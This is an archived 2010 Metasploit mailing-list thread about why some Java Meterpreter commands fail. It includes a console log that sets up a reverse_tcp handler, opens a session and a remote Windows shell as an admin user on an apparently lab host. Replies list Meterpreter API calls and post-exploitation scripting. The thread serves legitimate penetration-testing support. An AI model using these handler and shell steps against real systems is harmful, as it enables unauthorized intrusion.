Metasploit mailing list archives
Re: Meterpreter commands failing
From: Matthew Presson <matthew.presson () gmail com>
Date: Tue, 19 Oct 2010 11:12:07 -0500
Thanks all. As for the privileges of the compromised user, they were an admin on the system. For future reference, I have also seen this fail on HP-UX systems. Thanks again for all the answers.

--matt

On 10/19/10, Carlos Perez <carlos_perez () darkoperator com> wrote:

I would say it depends on the case and target. For instance, I can run the Java Meterpreter on OSX, Windows and Linux; it also provides the flexibility of working better as a payload for certain attacks. Right now you can script it with the multicommand and multi_console_command to automate post exploitation. Right now upload_exec is written to use the client.fs.file.expand_path; that is the only limitation right now for that script.

Cheers,
Carlos

On Oct 19, 2010, at 6:04 AM, Miguel Rios wrote:

I'd say that the java payload is of limited use if one cannot have it run a script like uploadexec. Still early stages I guess, but I usually disable the java payloads on tools like browser_autopwn precisely because of their limitations. Hopefully they'll become more robust and versatile in the future.

--- On Tue, 10/19/10, Carlos Perez <carlos_perez () darkoperator com> wrote:

From: Carlos Perez <carlos_perez () darkoperator com>
Subject: Re: [framework] Meterpreter commands failing
To: "Tasos Laskos" <tasos.laskos () gmail com>
Cc: framework () spool metasploit com
Date: Tuesday, October 19, 2010, 2:09 AM

Each version of meterpreter has its own list of supported commands. For example, the API calls supported for the PHP version:

stdapi_fs_expand_path
stdapi_fs_chdir
stdapi_fs_delete
stdapi_fs_getwd
stdapi_fs_ls
stdapi_fs_stat
stdapi_fs_delete_file
stdapi_sys_config_getuid
stdapi_sys_config_rev2self
stdapi_sys_config_sysinfo
stdapi_sys_process_execute
stdapi_sys_process_get_processes
stdapi_sys_process_getpid
stdapi_sys_process_kill
stdapi_net_socket_tcp_shutdown
channel_create_stdapi_fs_file
channel_create_stdapi_net_tcp_client
channel_create_stdapi_net_udp_client
core_channel_open
core_channel_eof
core_channel_read
core_channel_write
core_channel_close
core_channel_interact
core_loadlib

For Java, if you look at:

http://www.metasploit.com/redmine/projects/framework/repository/show/external/source/meterpreter/java/src/stdapi/com/metasploit/meterpreter/stdapi

you will see the calls supported. There are plans to have the menu only show those entries supported for a future release.

Regards,
Carlos

On Oct 18, 2010, at 9:52 PM, Tasos Laskos wrote:

My guess is lack of necessary privileges on the exploited system. The same thing happens with all meterpreter payloads.

- Tasos

On 19/10/10 02:46, Matthew Presson wrote:

When trying to run some meterpreter commands (use priv, ps, getpid, etc) they fail with "Operation failed" messages. Here is some of the output from the session.

       =[ metasploit v3.5.0-dev [core:3.5 api:1.0]
+ -- --=[ 612 exploits - 306 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r10741 updated today (2010.10.19)

msf > use multi/handler
msf exploit(handler) > set PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.10:4444
[*] Starting the payload handler...
^C[-] Exploit exception: Interrupt
[*] Exploit completed, but no session was created.
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.10:4444
[*] Starting the payload handler...
[*] Sending stage (26938 bytes) to 192.168.1.4
[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.4:3022) at 2010-10-18 20:34:16 -0500

meterpreter > use priv
Loading extension priv...
[-] Failed to load extension: No such file or directory - /opt/metasploit3/msf3/data/meterpreter/ext_server_priv.jar
meterpreter > getpid
[-] stdapi_sys_process_getpid: Operation failed:
meterpreter > ps
[-] stdapi_sys_process_get_processes: Operation failed:
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
[-] stdapi_sys_config_getprivs: Operation failed:
meterpreter > sysinfo
Computer: Windows7
OS      : Windows 7 6.1 (x86)
meterpreter > getuid
Server username: AdminUser
meterpreter > shell
Process 1 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\AdminUser\Desktop>

Am I doing something wrong, or are these limitations a product of the java/meterpreter payload?

-- Matt

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

--
Sent from my mobile device

Matt